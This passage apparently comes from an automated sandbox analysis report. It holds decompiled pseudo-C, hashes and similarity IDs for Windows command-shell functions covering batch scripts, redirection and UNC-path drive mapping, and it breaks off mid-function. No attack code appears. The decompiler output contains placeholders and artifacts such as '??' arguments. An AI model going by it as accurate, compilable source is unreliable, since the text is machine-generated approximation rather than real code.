                                                      • API String ID: 2203007708-0
                                                      • Opcode ID: 170befda794bf92abe04a845c041b134bd0e2faa78ae98a6ce9fedf5d87c28d6
                                                      • Instruction ID: de2774d4ed88194d1fa5c6ea0ed2412de526fc5ff60d38250bae5813b285cc7f
                                                      • Opcode Fuzzy Hash: 170befda794bf92abe04a845c041b134bd0e2faa78ae98a6ce9fedf5d87c28d6
                                                      • Instruction Fuzzy Hash: D621BB72604115BBEF701FB4DD4ABDA3FA9EF057B1F214120F615CA0D0DAB0A814CBA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 47%
                                                      			E4A735C8C(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                      				signed int _t84;
                                                      				signed int _t88;
                                                      				signed int _t90;
                                                      				signed int _t93;
                                                      				signed int _t97;
                                                      				signed int _t98;
                                                      				signed int _t99;
                                                      				signed int _t100;
                                                      				signed int _t101;
                                                      				signed int _t104;
                                                      				signed int _t109;
                                                      				signed int _t110;
                                                      				signed int _t112;
                                                      				intOrPtr _t116;
                                                      				signed int _t117;
                                                      				void* _t118;
                                                      				signed int _t119;
                                                      				signed int _t120;
                                                      				signed int _t121;
                                                      				intOrPtr _t124;
                                                      				signed int _t125;
                                                      				intOrPtr* _t126;
                                                      				signed int _t128;
                                                      				signed short* _t130;
                                                      				signed int _t131;
                                                      				signed int _t134;
                                                      				intOrPtr* _t135;
                                                      				long _t137;
                                                      				intOrPtr* _t138;
                                                      				signed int _t149;
                                                      				signed int _t152;
                                                      				signed int _t154;
                                                      				long _t156;
                                                      				void* _t161;
                                                      				void* _t162;
                                                      				signed int _t163;
                                                      				signed int _t164;
                                                      				signed int _t166;
                                                      				signed int _t167;
                                                      				intOrPtr _t168;
                                                      				signed int _t171;
                                                      				intOrPtr* _t172;
                                                      				signed int _t175;
                                                      				signed int _t176;
                                                      				intOrPtr* _t177;
                                                      				signed int _t180;
                                                      				signed short* _t183;
                                                      				signed int _t186;
                                                      				void* _t187;
                                                      				void* _t188;
                                                      				intOrPtr* _t189;
                                                      				void* _t190;
                                                      				intOrPtr _t191;
                                                      				intOrPtr* _t193;
                                                      				intOrPtr* _t194;
                                                      				intOrPtr _t197;
                                                      				signed short* _t199;
                                                      				void* _t200;
                                                      
                                                      				_push(0x8c);
                                                      				_push(0x4a735fa8);
                                                      				E4A7313E1(__ebx, __edi, __esi);
                                                      				_t156 =  *((intOrPtr*)(_t200 + 8));
                                                      				 *((intOrPtr*)(_t200 - 0x98)) = _t156;
                                                      				 *((intOrPtr*)(_t200 - 0x94)) =  *((intOrPtr*)(_t200 + 0xc));
                                                      				 *((intOrPtr*)(_t200 - 0x8c)) = 0x70;
                                                      				 *((intOrPtr*)(_t200 - 0x88)) = 5;
                                                      				_t193 = 0;
                                                      				 *(_t200 - 0x84) = 0;
                                                      				memset(_t200 - 0x80, 0, 0x64);
                                                      				 *((intOrPtr*)(_t200 - 0x90)) = 0;
                                                      				_t81 =  *0x4a7540b4; // 0x0
                                                      				 *((intOrPtr*)(_t81 + 0x30)) = 0;
                                                      				 *0x4a754080 = 0;
                                                      				 *((intOrPtr*)(_t200 - 4)) = 0;
                                                      				_t196 = 0x4a768640;
                                                      				 *(_t200 - 0x84) = 0x4a768640;
                                                      				if( *0x4a754081 != 0) {
                                                      					__eax =  *(__ebx + 0x38);
                                                      					__eflags =  *( *(__ebx + 0x38)) - 0x3a;
                                                      					if( *( *(__ebx + 0x38)) == 0x3a) {
                                                      						__eax =  *0x4a7540b4; // 0x0
                                                      						__eax =  *(__eax + 0x110);
                                                      						 *(__ebp - 0x84) = __eax;
                                                      					}
                                                      				}
                                                      				_t84 =  *0x4a754014(1, _t200 - 0x8c, _t200 - 0x90, L"SCRIPT");
                                                      				__eflags = _t84;
                                                      				if(_t84 == 0) {
                                                      					L44:
                                                      					 *((intOrPtr*)(_t200 - 4)) = 0xfffffffe;
                                                      					goto L4;
                                                      				} else {
                                                      					_t88 =  *0x4a7540b4; // 0x0
                                                      					_t90 =  *0x4a754010( *((intOrPtr*)(_t200 - 0x90)), _t193, _t88 + 0x30, 1, _t193);
                                                      					__eflags = _t90;
                                                      					if(_t90 == 0) {
                                                      						_t156 = GetLastError();
                                                      						_t196 = 0x4ec;
                                                      						__eflags = _t156 - 0x4ec;
                                                      						if(_t156 == 0x4ec) {
                                                      							L47:
                                                      							 *0x4a754004( *((intOrPtr*)(_t200 - 0x90)),  *((intOrPtr*)(_t200 - 0x94)), _t193);
                                                      							__eflags = _t156 - _t196;
                                                      							if(_t156 == _t196) {
                                                      								_push(_t193);
                                                      								_push(_t196);
                                                      								E4A736D44(_t157);
                                                      							}
                                                      							L49:
                                                      							_t93 =  *0x4a7540b4; // 0x0
                                                      							 *((intOrPtr*)(_t93 + 0x30)) = _t193;
                                                      							 *0x4a75400c( *((intOrPtr*)(_t200 - 0x90)));
                                                      							goto L44;
                                                      						}
                                                      						__eflags = _t156 - 0x312;
                                                      						if(_t156 != 0x312) {
                                                      							goto L49;
                                                      						}
                                                      						goto L47;
                                                      					}
                                                      					 *0x4a75400c( *((intOrPtr*)(_t200 - 0x90)));
                                                      					_t97 =  *0x4a7540b4; // 0x0
                                                      					__eflags =  *((intOrPtr*)(_t97 + 0x30)) - _t193;
                                                      					if( *((intOrPtr*)(_t97 + 0x30)) != _t193) {
                                                      						_t98 =  *0x4a754008( *((intOrPtr*)(_t97 + 0x30)));
                                                      						__eflags = _t98;
                                                      						if(_t98 != 0) {
                                                      							goto L11;
                                                      						}
                                                      						_t152 =  *0x4a7540b4; // 0x0
                                                      						CloseHandle( *(_t152 + 0x30));
                                                      						_t154 =  *0x4a7540b4; // 0x0
                                                      						 *((intOrPtr*)(_t154 + 0x30)) = _t193;
                                                      						goto L44;
                                                      					}
                                                      					L11:
                                                      					 *((intOrPtr*)(_t200 - 4)) = 0xfffffffe;
                                                      					 *0x4a754080 = 1;
                                                      					_t99 =  *0x4a7540b4; // 0x0
                                                      					 *((intOrPtr*)(_t99 + 8)) = _t193;
                                                      					_t100 =  *0x4a7540b4; // 0x0
                                                      					 *_t100 =  *((intOrPtr*)(_t200 - 0x94));
                                                      					_t81 =  *(_t200 + 0x10);
                                                      					_t157 =  *0x4a7540b4; // 0x0
                                                      					 *(_t157 + 4) =  *(_t200 + 0x10);
                                                      					__eflags =  *0x4a754081;
                                                      					if( *0x4a754081 == 0) {
                                                      						goto L1;
                                                      					} else {
                                                      						_t157 =  *(_t156 + 0x38);
                                                      						__eflags =  *( *(_t156 + 0x38)) - 0x3a;
                                                      						if( *( *(_t156 + 0x38)) != 0x3a) {
                                                      							goto L1;
                                                      						}
                                                      						_t149 =  *0x4a7540b4; // 0x0
                                                      						_t194 =  *((intOrPtr*)(_t149 + 0x110));
                                                      						E4A73185A( *_t149,  *((intOrPtr*)(_t149 + 4)),  *_t194);
                                                      						_t186 =  *0x4a7540b4; // 0x0
                                                      						 *((intOrPtr*)(_t186 + 8)) =  *((intOrPtr*)(_t194 + 8));
                                                      						_t193 = 0;
                                                      						__eflags = 0;
                                                      						L15:
                                                      						E4A73185A(_t196, 0x2000,  *(_t156 + 0x38));
                                                      						_t104 = _t196;
                                                      						_t34 = _t104 + 2; // 0x4a768642
                                                      						_t161 = _t34;
                                                      						do {
                                                      							_t187 =  *_t104;
                                                      							_t104 = _t104 + 2;
                                                      							__eflags = _t187 - _t193;
                                                      						} while (_t187 != _t193);
                                                      						_t193 = 0x4a768642 + (_t104 - _t161 >> 1) * 2;
                                                      						 *_t193 = 0;
                                                      						_t109 =  *(_t156 + 0x3c);
                                                      						_t156 = 0;
                                                      						__eflags = _t109;
                                                      						if(_t109 != 0) {
                                                      							__eflags = 0x2000;
                                                      							E4A73185A(_t193, 0x2000 - (_t193 - _t196 >> 1), _t109);
                                                      						}
                                                      						_t110 =  *0x4a7540b4; // 0x0
                                                      						E4A731911( *((intOrPtr*)(_t110 + 0xc)));
                                                      						_t112 = _t196;
                                                      						_t39 = _t112 + 2; // 0x4a768642
                                                      						_t188 = _t39;
                                                      						do {
                                                      							_t162 =  *_t112;
                                                      							_t112 = _t112 + 2;
                                                      							__eflags = _t162 - _t156;
                                                      						} while (_t162 != _t156);
                                                      						_t163 =  *0x4a7540b4; // 0x0
                                                      						 *(_t163 + 0x64) = _t112 - _t188 >> 1;
                                                      						_t116 = E4A7319D6(_t196);
                                                      						_t164 =  *0x4a7540b4; // 0x0
                                                      						 *((intOrPtr*)(_t164 + 0x3c)) = _t116;
                                                      						_t117 =  *0x4a7540b4; // 0x0
                                                      						__eflags =  *((intOrPtr*)(_t117 + 0x3c)) - _t156;
                                                      						if( *((intOrPtr*)(_t117 + 0x3c)) == _t156) {
                                                      							L4:
                                                      							L41:
                                                      							return E4A7313CA(_t156, _t193, _t196);
                                                      						}
                                                      						 *((intOrPtr*)(_t117 + 0x8c)) =  *((intOrPtr*)(_t117 + 0x3c));
                                                      						_t118 = 0x68;
                                                      						do {
                                                      							_t166 =  *0x4a7540b4; // 0x0
                                                      							 *((intOrPtr*)(_t118 + _t166 - 0x28)) = _t156;
                                                      							_t167 =  *0x4a7540b4; // 0x0
                                                      							 *((intOrPtr*)(_t118 + _t167)) = _t156;
                                                      							_t118 = _t118 + 4;
                                                      							__eflags = _t118 - 0x8c;
                                                      						} while (_t118 < 0x8c);
                                                      						__eflags =  *_t193 - _t156;
                                                      						if( *_t193 == _t156) {
                                                      							_t119 =  *0x4a7540b4; // 0x0
                                                      							 *((intOrPtr*)(_t119 + 0x38)) = _t156;
                                                      							_t120 =  *0x4a7540b4; // 0x0
                                                      							 *((intOrPtr*)(_t120 + 0x34)) = _t156;
                                                      							L40:
                                                      							_t121 =  *0x4a7540b4; // 0x0
                                                      							_t168 =  *0x4a754104; // 0x0
                                                      							 *((intOrPtr*)(_t121 + 0x10)) = _t168;
                                                      							__eflags = 0;
                                                      							goto L41;
                                                      						}
                                                      						_t124 = E4A7319D6(_t193);
                                                      						_t171 =  *0x4a7540b4; // 0x0
                                                      						 *((intOrPtr*)(_t171 + 0x34)) = _t124;
                                                      						_t125 =  *0x4a7540b4; // 0x0
                                                      						_t189 =  *((intOrPtr*)(_t125 + 0x34));
                                                      						__eflags = _t189 - _t156;
                                                      						if(_t189 == _t156) {
                                                      							goto L4;
                                                      						}
                                                      						_t172 = _t189;
                                                      						_t126 = _t189;
                                                      						_t193 = _t126 + 2;
                                                      						do {
                                                      							_t196 =  *_t126;
                                                      							_t126 = _t126 + 2;
                                                      							__eflags = _t196 - _t156;
                                                      						} while (_t196 != _t156);
                                                      						_t128 = _t126 - _t193;
                                                      						__eflags = _t128;
                                                      						_t130 = _t172 + (_t128 >> 1) * 2;
                                                      						while(1) {
                                                      							__eflags = _t130 - _t189;
                                                      							if(_t130 == _t189) {
                                                      								break;
                                                      							}
                                                      							_t55 = _t130 - 2; // 0x38
                                                      							_t183 = _t55;
                                                      							_t196 =  *_t183 & 0x0000ffff;
                                                      							__eflags = _t196 - 0x20;
                                                      							if(_t196 == 0x20) {
                                                      								L5:
                                                      								_t130 = _t183;
                                                      								continue;
                                                      							}
                                                      							__eflags = _t196 - 9;
                                                      							if(_t196 == 9) {
                                                      								goto L5;
                                                      							}
                                                      							break;
                                                      						}
                                                      						 *_t130 = 0;
                                                      						__eflags =  *0x4a754081; // 0x0
                                                      						if(__eflags == 0) {
                                                      							_t131 =  *0x4a7540b4; // 0x0
                                                      							_push( *0x4a77065c & 0x0000ffff);
                                                      							_push( *((intOrPtr*)(_t131 + 0x34)));
                                                      							while(1) {
                                                      								_t196 = E4A7318EB();
                                                      								__eflags = _t196 - _t156;
                                                      								if(_t196 == _t156) {
                                                      									goto L33;
                                                      								}
                                                      								_t199 = _t196 + 2;
                                                      								_t137 = towupper( *_t199 & 0x0000ffff);
                                                      								__eflags = _t137 - 0x51;
                                                      								if(_t137 == 0x51) {
                                                      									 *0x4a75408c = _t156;
                                                      									_t75 = _t199 - 2; // 0x0
                                                      									_t182 = _t75;
                                                      									_t138 = _t75;
                                                      									_t76 = _t138 + 2; // 0x2
                                                      									_t193 = _t76;
                                                      									do {
                                                      										_t191 =  *_t138;
                                                      										_t138 = _t138 + 2;
                                                      										__eflags = _t191 - _t156;
                                                      									} while (_t191 != _t156);
                                                      									_t196 =  &(_t199[1]);
                                                      									E4A73185A(_t182, (_t138 - _t193 >> 1) + 1,  &(_t199[1]));
                                                      									goto L33;
                                                      								}
                                                      								_push( *0x4a77065c & 0x0000ffff);
                                                      								_push(_t199);
                                                      							}
                                                      						}
                                                      						L33:
                                                      						_t134 =  *0x4a7540b4; // 0x0
                                                      						_t135 = E4A7322CA( *((intOrPtr*)(_t134 + 0x34)), _t156, _t156);
                                                      						__eflags =  *_t135 - _t156;
                                                      						if( *_t135 == _t156) {
                                                      							L39:
                                                      							_t175 =  *0x4a7540b4; // 0x0
                                                      							 *((intOrPtr*)(_t175 + 0x38)) = _t135;
                                                      							goto L40;
                                                      						}
                                                      						_t190 = 0x68;
                                                      						while(1) {
                                                      							__eflags = _t190 - 0x8c;
                                                      							if(_t190 >= 0x8c) {
                                                      								goto L39;
                                                      							}
                                                      							_t176 =  *0x4a7540b4; // 0x0
                                                      							 *((intOrPtr*)(_t190 + _t176 - 0x28)) = _t135;
                                                      							_t177 = _t135;
                                                      							_t59 = _t177 + 2; // 0x2
                                                      							_t193 = _t59;
                                                      							do {
                                                      								_t197 =  *_t177;
                                                      								_t177 = _t177 + 2;
                                                      								__eflags = _t197 - _t156;
                                                      							} while (_t197 != _t156);
                                                      							_t180 = _t177 - _t193 >> 1;
                                                      							_t196 =  *0x4a7540b4; // 0x0
                                                      							 *(_t190 + _t196) = _t180;
                                                      							_t135 = _t135 + 2 + _t180 * 2;
                                                      							_t190 = _t190 + 4;
                                                      							__eflags =  *_t135 - _t156;
                                                      							if( *_t135 != _t156) {
                                                      								continue;
                                                      							}
                                                      							goto L39;
                                                      						}
                                                      						goto L39;
                                                      					}
                                                      				}
                                                      				L1:
                                                      				_t101 =  *0x4a7540b4; // 0x0
                                                      				if(E4A732FAF(_t157,  *_t101, _t81, _t196) == 0) {
                                                      					goto L15;
                                                      				}
                                                      				goto L4;
                                                      			}

                                                      0x4a735f35
                                                      0x4a735f38
                                                      0x4a735f77
                                                      0x4a735f77
                                                      0x4a735f7d
                                                      0x00000000
                                                      0x4a735f7d
                                                      0x4a735f3c
                                                      0x4a735f3d
                                                      0x4a735f3d
                                                      0x4a735f43
                                                      0x00000000
                                                      0x00000000
                                                      0x4a735f45
                                                      0x4a735f4b
                                                      0x4a735f4f
                                                      0x4a735f51
                                                      0x4a735f51
                                                      0x4a735f54
                                                      0x4a735f54
                                                      0x4a735f58
                                                      0x4a735f59
                                                      0x4a735f59
                                                      0x4a735f60
                                                      0x4a735f62
                                                      0x4a735f68
                                                      0x4a735f6b
                                                      0x4a735f6f
                                                      0x4a735f72
                                                      0x4a735f75
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x4a735f75
                                                      0x00000000
                                                      0x4a735f3d
                                                      0x4a735db4
                                                      0x4a7355c8
                                                      0x4a7355ca
                                                      0x4a7355d8
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true
                                                      • Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp
                                                      Similarity
                                                      • API ID: memsetwcsspn
                                                      • String ID: SCRIPT
                                                      • API String ID: 3809306610-3967369404
                                                      • Opcode ID: 677aff689a2ea82e2f0e2b54dec129f71642c58679e9622bcd5eb2b718dfbc2b
                                                      • Instruction ID: 0eed83a258add827fbfe1e35059f4d47253182e6ef7e327e828853b2eafd888f
                                                      • Opcode Fuzzy Hash: 677aff689a2ea82e2f0e2b54dec129f71642c58679e9622bcd5eb2b718dfbc2b
                                                      • Instruction Fuzzy Hash: D3C1D2B1644521DFD7B0CF24C989EA97BFAFF49300F5240A9E909CBA52DB309E48DB54
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 44%
                                                      			E4A7347C7(signed int _a4, intOrPtr* _a8) {
                                                      				signed int _v8;
                                                      				short _v528;
                                                      				intOrPtr* _v532;
                                                      				void* __ebx;
                                                      				void* __edi;
                                                      				void* __esi;
                                                      				signed int _t37;
                                                      				intOrPtr* _t39;
                                                      				void* _t40;
                                                      				void* _t42;
                                                      				WCHAR* _t43;
                                                      				void* _t54;
                                                      				WCHAR* _t60;
                                                      				void* _t63;
                                                      				signed int _t65;
                                                      				void* _t70;
                                                      				intOrPtr* _t72;
                                                      				intOrPtr* _t73;
                                                      				void* _t77;
                                                      				intOrPtr* _t79;
                                                      				signed int _t83;
                                                      				short* _t84;
                                                      				signed int _t85;
                                                      				intOrPtr _t92;
                                                      				intOrPtr _t94;
                                                      				intOrPtr* _t96;
                                                      				void* _t98;
                                                      				intOrPtr _t100;
                                                      				intOrPtr* _t101;
                                                      				signed int _t102;
                                                      
                                                      				_t37 =  *0x4a7540ac; // 0xbb40e64e
                                                      				_v8 = _t37 ^ _t102;
                                                      				_t85 = _a4;
                                                      				_t100 =  *((intOrPtr*)(_t85 + 0x34));
                                                      				while(_t100 != 0) {
                                                      					_t93 =  *((intOrPtr*)(_t100 + 4));
                                                      					_t73 =  *((intOrPtr*)(_t100 + 4));
                                                      					_t5 = _t73 + 2; // 0x2
                                                      					_t98 = _t5;
                                                      					do {
                                                      						_t96 =  *_t73;
                                                      						_t73 = _t73 + 2;
                                                      					} while (_t96 != 0);
                                                      					_t77 = E4A732598(_t93, _t93);
                                                      					_t97 = (_t73 - _t98 >> 1) + 1;
                                                      					E4A73185A( *((intOrPtr*)(_t100 + 4)), (_t73 - _t98 >> 1) + 1, _t77);
                                                      					if( *((intOrPtr*)(_t100 + 8)) != 0) {
                                                      						L9:
                                                      						_t100 =  *((intOrPtr*)(_t100 + 0x14));
                                                      						continue;
                                                      					}
                                                      					_t96 =  *((intOrPtr*)(_t100 + 4));
                                                      					_t79 = _t96;
                                                      					_t9 = _t79 + 2; // 0x2
                                                      					_t97 = _t9;
                                                      					do {
                                                      						_t94 =  *_t79;
                                                      						_t79 = _t79 + 2;
                                                      					} while (_t94 != 0);
                                                      					_t83 = (_t79 - _t97 >> 1) - 1;
                                                      					if(_t83 > 1) {
                                                      						_t84 = _t96 + _t83 * 2;
                                                      						if( *_t84 == 0x3a) {
                                                      							 *_t84 = 0;
                                                      						}
                                                      					}
                                                      					goto L9;
                                                      				}
                                                      				_t101 = _a8;
                                                      				if(_t101 == 3) {
                                                      					_t39 =  *0x4a7540fc; // 0x0
                                                      					_v532 = _t39;
                                                      					L13:
                                                      					_t101 =  *((intOrPtr*)(_t85 + 0x34));
                                                      					if(_t101 == 0) {
                                                      						L29:
                                                      						_t40 = 0;
                                                      						L30:
                                                      						return E4A7313A9(_t40, _t85, _v8 ^ _t102, _t96, _t97, _t101);
                                                      					}
                                                      					_t85 = _t85 | 0xffffffff;
                                                      					do {
                                                      						if( *(_t101 + 8) != 0) {
                                                      							goto L28;
                                                      						}
                                                      						_t97 = __imp___get_osfhandle;
                                                      						_t42 =  *_t97( *_t101);
                                                      						_pop(_t88);
                                                      						if(_t42 == _t85) {
                                                      							L38:
                                                      							 *(_t101 + 8) = _t85;
                                                      							L21:
                                                      							_t43 =  *(_t101 + 4);
                                                      							if( *_t43 == 0x26) {
                                                      								_t88 = 0;
                                                      								_t43[2] = 0;
                                                      								if(E4A7346D3((( *(_t101 + 4))[1] & 0x0000ffff) - 0x30, (( *(_t101 + 4))[1] & 0x0000ffff) - 0x30,  *_t101) != _t85) {
                                                      									goto L28;
                                                      								}
                                                      								L41:
                                                      								E4A734738();
                                                      								E4A736D44(_t88, 0x2344, 1, E4A739A2C(E4A735104,  *_t101));
                                                      								L37:
                                                      								_t40 = 1;
                                                      								goto L30;
                                                      							}
                                                      							if( *((short*)(_t101 + 0x10)) == 0x3c) {
                                                      								_t97 = E4A7339EF(_t43, 0x8000);
                                                      								if(_t97 != _t85) {
                                                      									L25:
                                                      									_t53 =  *_t101;
                                                      									if(_t97 !=  *_t101) {
                                                      										_t54 = E4A7346D3(_t53, _t97, _t53);
                                                      										_push(_t97);
                                                      										if(_t54 == _t85) {
                                                      											E4A733AB3();
                                                      											goto L41;
                                                      										}
                                                      										E4A733AB3();
                                                      										_t97 =  *_t101;
                                                      									}
                                                      									if(_t97 == _t85) {
                                                      										L36:
                                                      										E4A734738();
                                                      										E4A74056B( *0x4a754128);
                                                      										goto L37;
                                                      									}
                                                      									 *((intOrPtr*)(_v532 + 4)) = _t97;
                                                      									goto L28;
                                                      								}
                                                      								_t60 = E4A73321B(_t88, L"DPATH");
                                                      								if(_t60 == 0) {
                                                      									goto L36;
                                                      								}
                                                      								_t88 =  &_v528;
                                                      								if(SearchPathW(_t60,  *(_t101 + 4), 0, 0x104,  &_v528, 0) == 0) {
                                                      									goto L36;
                                                      								}
                                                      								_push(0x8000);
                                                      								_t43 =  &_v528;
                                                      								L24:
                                                      								_push(_t43);
                                                      								_t97 = E4A7339EF();
                                                      								if(_t97 == _t85) {
                                                      									goto L36;
                                                      								}
                                                      								goto L25;
                                                      							}
                                                      							asm("sbb ecx, ecx");
                                                      							_t88 = ( ~( *(_t101 + 0xc)) & 0xfffffe09) + 0x301;
                                                      							_push(( ~( *(_t101 + 0xc)) & 0xfffffe09) + 0x301);
                                                      							goto L24;
                                                      						}
                                                      						_t63 =  *_t97( *_t101);
                                                      						_pop(_t88);
                                                      						if(_t63 == 0xfffffffe) {
                                                      							goto L38;
                                                      						}
                                                      						if(E4A733B03(_t63, _t88,  *_t101) == 0) {
                                                      							_t64 = E4A736BEA(_t64,  *_t101);
                                                      							if(_t64 != 0) {
                                                      								goto L19;
                                                      							}
                                                      							_t70 =  *_t97( *_t101, _t64, _t64, 1);
                                                      							_pop(_t88);
                                                      							if(SetFilePointer(_t70, ??, ??, ??) != _t85) {
                                                      								goto L19;
                                                      							}
                                                      							_push(E4A739A2C(E4A735104,  *_t101));
                                                      							_push(1);
                                                      							_push(0x40002721);
                                                      							L50:
                                                      							E4A736D44(_t88);
                                                      							 *(_t101 + 8) =  *(_t101 + 8) & 0x00000000;
                                                      							E4A734738();
                                                      							goto L37;
                                                      						}
                                                      						L19:
                                                      						_t65 = E4A734794(_t64,  *_t101);
                                                      						_push( *_t101);
                                                      						 *(_t101 + 8) = _t65;
                                                      						if(_t65 == _t85) {
                                                      							_push(E4A735104);
                                                      							_push(E4A739A2C());
                                                      							_push(1);
                                                      							_push(0x2344);
                                                      							goto L50;
                                                      						}
                                                      						E4A733AB3();
                                                      						goto L21;
                                                      						L28:
                                                      						_t101 =  *((intOrPtr*)(_t101 + 0x14));
                                                      					} while (_t101 != 0);
                                                      					goto L29;
                                                      				}
                                                      				_t72 = E4A731896(0x10);
                                                      				_v532 = _t72;
                                                      				if(_t72 == 0) {
                                                      					goto L37;
                                                      				}
                                                      				_t92 =  *0x4a7540fc; // 0x0
                                                      				 *((intOrPtr*)(_t72 + 0xc)) = _t92;
                                                      				 *0x4a7540fc = _t72;
                                                      				 *(_t72 + 8) = _t85;
                                                      				 *_t72 = _t101;
                                                      				goto L13;
                                                      			}

































                                                      0x00000000

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true
                                                      • Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp
                                                      Similarity
                                                      • API ID: _get_osfhandle
                                                      • String ID: DPATH
                                                      • API String ID: 210771365-2010427443
                                                      • Opcode ID: 4b3602d7b0755a5c6863620aea1be0c7cab2a6da28b77e638cbc66fd8874d8f9
                                                      • Instruction ID: e4842b329dded8941b3d16a4abd2fc1436716086a41e51c65f33c17739b189aa
                                                      • Opcode Fuzzy Hash: 4b3602d7b0755a5c6863620aea1be0c7cab2a6da28b77e638cbc66fd8874d8f9
                                                      • Instruction Fuzzy Hash: C271137165CA01AEDB749FA0C888AA67FF9EB40311F134568E582DB193DBB1D948CB60
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 82%
                                                      			E4A73BF22(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                      				WCHAR* _t44;
                                                      				void* _t48;
                                                      				void* _t49;
                                                      				void* _t55;
                                                      				long _t58;
                                                      				WCHAR* _t61;
                                                      				wchar_t* _t67;
                                                      				signed char _t68;
                                                      				long _t70;
                                                      				short _t74;
                                                      				long _t80;
                                                      				long _t82;
                                                      				wchar_t* _t88;
                                                      				wchar_t* _t93;
                                                      				short _t96;
                                                      				short _t99;
                                                      				signed int _t105;
                                                      				signed short* _t110;
                                                      				WCHAR* _t113;
                                                      				void* _t114;
                                                      				intOrPtr _t116;
                                                      				void* _t117;
                                                      				void* _t123;
                                                      				void* _t125;
                                                      				void* _t128;
                                                      
                                                      				_push(0x44);
                                                      				_push(0x4a73c018);
                                                      				E4A7313E1(__ebx, __edi, __esi);
                                                      				_t116 =  *0x4a754081; // 0x0
                                                      				_t88 = 0;
                                                      				_t113 = E4A7322CA( *((intOrPtr*)( *((intOrPtr*)(_t114 + 8)) + 0x3c)), 0, 0 | _t116 != 0x00000000);
                                                      				 *(_t114 - 0x30) = _t113;
                                                      				_t117 =  *0x4a754081 - _t88; // 0x0
                                                      				if(_t117 == 0) {
                                                      					L4:
                                                      					_t44 = _t113;
                                                      					_t6 =  &(_t44[1]); // 0x2
                                                      					_t105 = _t6;
                                                      					do {
                                                      						_t93 =  *_t44;
                                                      						_t44 =  &(_t44[1]);
                                                      					} while (_t93 != _t88);
                                                      					_t48 = E4A732598(_t93, _t113);
                                                      					_t108 = (_t44 - _t105 >> 1) + 1;
                                                      					_t49 = E4A73185A(_t113, (_t44 - _t105 >> 1) + 1, _t48);
                                                      					 *0x4a754188 = _t88;
                                                      					if( *_t113 == _t88) {
                                                      						E4A74F174(_t49);
                                                      						L15:
                                                      						return E4A7313CA(_t88, _t108, _t113);
                                                      					}
                                                      					if(E4A73C039(_t93) == 0) {
                                                      						_push(_t88);
                                                      						_push(0x40002728);
                                                      						L41:
                                                      						E4A736D44(_t93);
                                                      						 *0x4a754188 = 1;
                                                      						goto L15;
                                                      					}
                                                      					_t123 =  *0x4a754081 - _t88; // 0x0
                                                      					if(_t123 == 0 ||  *_t113 != 0x5c) {
                                                      						L10:
                                                      						_t108 = 0;
                                                      						_t125 =  *0x4a754188 - _t108; // 0x0
                                                      						if(_t125 != 0) {
                                                      							L39:
                                                      							_t55 = E4A7372A1(__eflags);
                                                      							HeapFree(GetProcessHeap(), _t108, _t55);
                                                      							_push(_t108);
                                                      							_push( *0x4a754188);
                                                      							goto L41;
                                                      						}
                                                      						_t58 = E4A736C78(_t113, 1);
                                                      						 *0x4a754188 = _t58;
                                                      						if(_t58 == 0 && _t113[1] == 0x3a) {
                                                      							E4A732C56(_t88, _t105, 0, 0x4a755260, 0x104,  *_t113 & 0x0000ffff);
                                                      						}
                                                      						_t128 =  *0x4a754188 - _t108; // 0x0
                                                      						if(_t128 != 0) {
                                                      							goto L39;
                                                      						}
                                                      						goto L15;
                                                      					} else {
                                                      						__eflags = _t113[1] - 0x5c;
                                                      						if(__eflags != 0) {
                                                      							goto L10;
                                                      						}
                                                      						_t61 = _t113;
                                                      						_t9 =  &(_t61[1]); // 0x2
                                                      						_t105 = _t9;
                                                      						do {
                                                      							_t96 =  *_t61;
                                                      							_t61 =  &(_t61[1]);
                                                      							__eflags = _t96 - _t88;
                                                      						} while (_t96 != _t88);
                                                      						 *((intOrPtr*)(_t114 - 0x2c)) = (_t61 - _t105 >> 1) + 1;
                                                      						_t11 =  &(_t113[2]); // 0x4
                                                      						_t67 = wcschr(_t11, 0x5c);
                                                      						_t88 = _t67;
                                                      						 *(_t114 - 0x28) = _t67;
                                                      						__eflags = _t88;
                                                      						if(_t88 != 0) {
                                                      							_t88 = wcschr( &(_t88[0]), 0x5c);
                                                      							 *(_t114 - 0x28) = _t88;
                                                      							__eflags = _t88;
                                                      							if(_t88 != 0) {
                                                      								_t80 = GetFileAttributesW(_t113);
                                                      								__eflags = _t80 - 0xffffffff;
                                                      								if(_t80 != 0xffffffff) {
                                                      									 *_t88 = 0;
                                                      									_t88 =  &(_t88[0]);
                                                      									__eflags = _t88;
                                                      									 *(_t114 - 0x28) = _t88;
                                                      								} else {
                                                      									_t82 = GetLastError();
                                                      									 *0x4a754188 = _t82;
                                                      									__eflags = _t82 - 2;
                                                      									if(_t82 == 2) {
                                                      										 *0x4a754188 = 3;
                                                      									}
                                                      								}
                                                      							}
                                                      						}
                                                      						_t68 = 0x5a;
                                                      						 *(_t114 - 0x24) = _t68;
                                                      						_t99 = 0x3a;
                                                      						 *((short*)(_t114 - 0x22)) = _t99;
                                                      						 *((short*)(_t114 - 0x20)) = 0;
                                                      						 *(_t114 - 0x50) = 1;
                                                      						 *((intOrPtr*)(_t114 - 0x44)) = _t114 - 0x24;
                                                      						 *(_t114 - 0x40) = _t113;
                                                      						 *(_t114 - 0x38) =  *(_t114 - 0x38) & 0x00000000;
                                                      						_t93 =  *0x4a754188; // 0x0
                                                      						while(1) {
                                                      							__eflags = _t93;
                                                      							if(__eflags != 0) {
                                                      								goto L10;
                                                      							}
                                                      							__eflags = _t68 - 0x41;
                                                      							if(__eflags == 0) {
                                                      								goto L10;
                                                      							}
                                                      							 *((intOrPtr*)(_t114 - 4)) = 0;
                                                      							_push(0);
                                                      							_push(0);
                                                      							_push(0);
                                                      							_t70 = _t114 - 0x54;
